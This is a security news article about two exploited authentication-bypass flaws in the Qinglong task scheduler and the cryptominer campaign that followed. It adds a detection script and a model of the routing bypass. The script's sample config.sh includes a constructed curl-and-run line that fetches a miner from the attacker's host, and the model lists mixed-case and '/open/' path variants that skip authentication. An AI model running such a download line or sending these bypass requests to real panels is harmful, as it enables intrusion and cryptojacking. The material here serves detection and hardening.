Qinglong Task Scheduler Flaws Exploited for Crypto Mining

Key Takeaways

- Two CVEs in Qinglong versions 2.20.1 and older allow authentication bypass and remote code execution
- Attackers have deployed cryptominers disguised as '.fullgc' since February 7, before public disclosure
- The effective fix arrived in PR #2941, not the initial mitigation in PR #2924
What Happened
Hackers are actively exploiting two authentication bypass vulnerabilities in Qinglong, an open-source task scheduling tool popular among Chinese developers. The attacks began on February 7, weeks before the security issues were publicly disclosed at the end of the month.
Researchers at cloud-native security company Snyk discovered the exploitation campaign. Qinglong has been forked more than 3,200 times and has over 19,000 stars on GitHub, making it a high-value target.
The attackers chain two flaws to achieve remote code execution, then deploy cryptominers that consume between 85% and 100% of victims' CPU power.
The Two Vulnerabilities
Both flaws affect Qinglong versions 2.20.1 and older. They stem from a mismatch between how security middleware and Express.js handle URL patterns.
- CVE-2026-3965: A rewrite rule maps requests under '/open/' onto the '/api/' handlers, so admin endpoints that should require authentication are reachable through the unauthenticated '/open/' prefix.
- CVE-2026-4047: Express matches routes case-insensitively by default, but the authentication check compares the path case-sensitively against '/api/'. A request to '/aPi/...' skips the check yet is routed to the same handler, so it bypasses authentication entirely.
“Both vulnerabilities stem from a mismatch between the security middleware's assumptions and the framework's behavior. The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently.”
— Snyk researchers
How the Attack Works
Qinglong users first noticed something wrong when a hidden process named '.fullgc' appeared on their systems, maxing out CPU usage. The name was chosen deliberately. It mimics a 'Full GC' (full garbage-collection) pass, a legitimate but CPU-heavy activity in managed runtimes, so a busy process with that name draws less immediate suspicion.
The attackers exploited the flaws to modify Qinglong's config.sh file. They injected shell commands that downloaded a miner binary to '/ql/data/db/.fullgc' and executed it in the background.
The remote server at 'file.551911.xyz' hosted multiple variants of the miner binary: Linux x86_64, ARM64, and macOS versions, so the same payload could run on whatever host the panel happened to be deployed on.
Snyk confirmed multiple infections across various setups, including instances running behind Nginx with SSL. A reverse proxy or TLS does not help here: the malicious requests are ordinary HTTPS requests to the application, and the bypass lives in Qinglong's own routing and authentication logic.
Patching Was Slow and Incomplete
The Qinglong maintainers responded on March 1, nearly a month after exploitation started. The initial patch in pull request #2924 focused on blocking command injection patterns. Snyk says this was insufficient.
The effective fix came in PR #2941, which corrected the authentication bypass in the middleware itself. Users running Qinglong 2.20.1 or older should update immediately.
Who Is at Risk
Anyone running a publicly exposed Qinglong panel on version 2.20.1 or earlier is vulnerable. The tool is primarily used by Chinese developers for automated task scheduling, but its GitHub popularity means it has users worldwide.
Signs of compromise include unexplained high CPU usage and the presence of a '.fullgc' process. Administrators should check for modifications to config.sh and inspect the '/ql/data/db/' directory for suspicious files.
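The following triage script is an added example, not code from Snyk, the Qinglong project, or the original article. It checks the three indicators named above (an injected config.sh, a '.fullgc' process pegging the CPU, and unexpected files under '/ql/data/db/') against text you paste in. The sample config.sh, process listing and directory listing are constructed for the example; the download path on the attacker host and the PIDs are made up, while the '.fullgc' name, the '/ql/data/db/' location, the 'file.551911.xyz' host and the 85-100% CPU figure come from the article. Treating dotfiles under '/ql/data/db/' as suspicious is an assumption about what that directory normally holds.

```javascript
// Added triage example (not Snyk's or Qinglong's code). Indicators from the
// article plus generic download-and-run patterns that an injected config.sh
// line is likely to contain.
const IOC_PATTERNS = [
  { name: 'fullgc-path', re: /\.fullgc\b/i },
  { name: 'miner-host', re: /file\.551911\.xyz/i },
  { name: 'download-and-execute', re: /\b(curl|wget)\b.*(\|\s*(sh|bash)\b|&&\s*chmod\s+\+x)/i },
  { name: 'backgrounded-binary', re: /\bnohup\b.*&\s*$/ },
];

// Scan config.sh line by line. Legitimate lines are VAR="value" assignments
// and comments, so anything matching an indicator deserves a look.
function findInjectedLines(configText) {
  const hits = [];
  configText.split('\n').forEach((line, i) => {
    const matched = IOC_PATTERNS.filter((p) => p.re.test(line)).map((p) => p.name);
    if (matched.length) hits.push({ line: i + 1, indicators: matched, text: line.trim() });
  });
  return hits;
}

// Parse `ps -eo user,pid,pcpu,pmem,args` output (header row first) and flag
// processes that are named like the miner or are consuming a whole core.
function findMinerProcesses(psText, cpuThreshold = 85) {
  return psText.trim().split('\n').slice(1).map((row) => {
    const [user, pid, cpu, mem, ...cmd] = row.trim().split(/\s+/);
    return { user, pid: Number(pid), cpu: Number(cpu), mem: Number(mem), cmd: cmd.join(' ') };
  }).filter((p) => /\.fullgc\b/.test(p.cmd) || p.cpu >= cpuThreshold);
}

// Assumption: a healthy /ql/data/db holds database files, not dotfiles, so
// any hidden entry is reported.
function findSuspiciousFiles(names) {
  return names.filter((n) => n.startsWith('.') && n !== '.' && n !== '..');
}

function triage(configText, psText, dbListing) {
  return {
    injectedLines: findInjectedLines(configText),
    minerProcesses: findMinerProcesses(psText),
    suspiciousFiles: findSuspiciousFiles(dbListing),
  };
}

// Constructed sample inputs (not real captures). The download path and the
// PIDs are invented for the example.
const SAMPLE_CONFIG = `## constructed sample of config.sh, not a real capture
DefaultCronRule="0 9 * * *"
RandomDelay="300"
# injected line (constructed); the download path is made up
curl -fsSL http://file.551911.xyz/x86_64 -o /ql/data/db/.fullgc && chmod +x /ql/data/db/.fullgc
nohup /ql/data/db/.fullgc >/dev/null 2>&1 &
`;

const SAMPLE_PS = `USER       PID %CPU %MEM COMMAND
root         1  0.0  0.1 /sbin/init
root       812  2.3  1.4 node /ql/build/app.js
root      2047 97.8  0.6 /ql/data/db/.fullgc
`;

const SAMPLE_DB_LISTING = ['app.db', 'env.db', '.fullgc'];

console.log(JSON.stringify(triage(SAMPLE_CONFIG, SAMPLE_PS, SAMPLE_DB_LISTING), null, 2));
```

On a live box, feed the functions the real file contents (`cat config.sh`, `ps -eo user,pid,pcpu,pmem,args`, `ls -a /ql/data/db`) rather than the constructed samples; a match on the generic download-and-execute pattern is a strong signal even if the attacker has renamed the binary.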
Lessons for Self-Hosted Tools
This incident highlights the risks of running self-hosted open-source tools with public-facing panels. The root cause was subtle: middleware and router disagreed about URL handling. Express matches routes case-insensitively and ignores trailing slashes by default, so any authentication check that compares the raw path with an exact, case-sensitive string prefix will diverge from what the router actually dispatches. These mismatches are common in Node.js applications built with Express.js.
Security teams should audit any self-hosted tools for similar authentication bypass patterns. Testing should include case variations in URL paths, trailing slashes, and unexpected route mappings such as aliases or rewrites that reach protected handlers under a different prefix. The safer design is to make the authentication decision on the same normalized path the router uses, and to deny by default so only an explicit allowlist of public paths is reachable without credentials.
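The model below is an added example, not Qinglong's code or Snyk's, written to illustrate the two bypass patterns from "The Two Vulnerabilities" and the audit check recommended just above. It simulates an Express-style pipeline twice: a vulnerable version with a case-sensitive auth check in front of a case-insensitive router and a '/open/' to '/api/' rewrite that runs after the auth decision, and a hardened version that normalizes the path, drops the rewrite and denies by default. Only the router's case-insensitive matching mirrors real Express (its "case sensitive routing" setting is off by default); the route names, the rewrite ordering, the hypothetical 'admin-config' and 'health' handlers and the public allowlist are assumptions made for the example.

```javascript
// Added example (not Qinglong's code): model of an Express-style pipeline.

// Compile a route the way Express does by default: case-insensitive, with
// the trailing slash optional.
function compileRoute(path, caseSensitive = false) {
  const escaped = path.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  return new RegExp(`^${escaped}/?$`, caseSensitive ? '' : 'i');
}

// Hypothetical routes. 'admin-config' stands in for a protected endpoint,
// 'health' for one that is meant to be public.
const ROUTES = [
  { path: '/api/system/config', handler: 'admin-config' },
  { path: '/api/health', handler: 'health' },
].map((r) => ({ ...r, re: compileRoute(r.path) }));

function route(path) {
  const hit = ROUTES.find((r) => r.re.test(path));
  return hit ? hit.handler : 'not-found';
}

// Model of the misconfigured rewrite: '/open/...' becomes '/api/...'.
function rewriteOpenToApi(path) {
  return path.replace(/^\/open\//i, '/api/');
}

// Vulnerable pipeline: the auth check compares the raw path case-sensitively,
// then the rewrite runs, then the case-insensitive router dispatches. Both
// '/aPi/...' (never checked) and '/open/...' (rewritten after the check)
// reach the protected handler without a token.
function vulnerablePipeline(req) {
  const needsAuth = req.path.startsWith('/api/');
  if (needsAuth && !req.token) return { status: 401, handler: null };
  return { status: 200, handler: route(rewriteOpenToApi(req.path)) };
}

// Hardened pipeline: fold case the same way the router does, make the auth
// decision on the final path with no rewrite behind it, and deny by default
// so only an explicit allowlist is reachable without a token.
const PUBLIC_ALLOWLIST = [/^\/api\/health\/?$/]; // assumed public endpoint

function normalizePath(p) {
  return p.toLowerCase().replace(/\/{2,}/g, '/');
}

function hardenedPipeline(req) {
  const path = normalizePath(req.path);
  const isPublic = PUBLIC_ALLOWLIST.some((re) => re.test(path));
  if (!isPublic && !req.token) return { status: 401, handler: null };
  return { status: 200, handler: route(path) };
}

// Audit helper: send unauthenticated variants of a protected path through a
// pipeline and report which ones still reach its handler. Against a real
// deployment the same variants would be sent as HTTP requests.
const VARIANTS = [
  '/api/system/config',
  '/aPi/system/config',
  '/API/system/config',
  '/open/system/config',
  '/OPEN/system/config',
];

function unauthenticatedReach(pipeline, handler = 'admin-config') {
  return VARIANTS.filter((p) => pipeline({ path: p, token: null }).handler === handler);
}

console.log('vulnerable, reachable without a token:', unauthenticatedReach(vulnerablePipeline));
console.log('hardened, reachable without a token:  ', unauthenticatedReach(hardenedPipeline));
```

The vulnerable pipeline lets four of the five variants through; the hardened one lets none through while still serving the allowlisted health endpoint and, with a token, the mixed-case admin path. The point of the allowlist is that a new route added later is protected until someone deliberately exempts it, which is the opposite of the failure mode seen here.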
Frequently Asked Questions
What is Qinglong and who uses it?
Qinglong is an open-source, self-hosted task scheduling platform popular among Chinese developers. It has over 19,000 GitHub stars and more than 3,200 forks.
How do I know if my Qinglong instance is compromised?
Look for a hidden process named '.fullgc' consuming 85-100% CPU. Check config.sh for unauthorized modifications and inspect '/ql/data/db/' for suspicious files.
Which Qinglong versions are affected?
Versions 2.20.1 and older are vulnerable. The effective fix is available in PR #2941.
Does running Qinglong behind Nginx or SSL protect against this attack?
No. Snyk confirmed infections on setups running behind Nginx with SSL. The exploitation happens at the application level.
What caused these vulnerabilities?
Both flaws stem from a mismatch between security middleware assumptions and Express.js routing behavior, particularly around URL pattern handling and case sensitivity.
Source: BleepingComputer
Huma Shazia
Senior AI & Tech Writer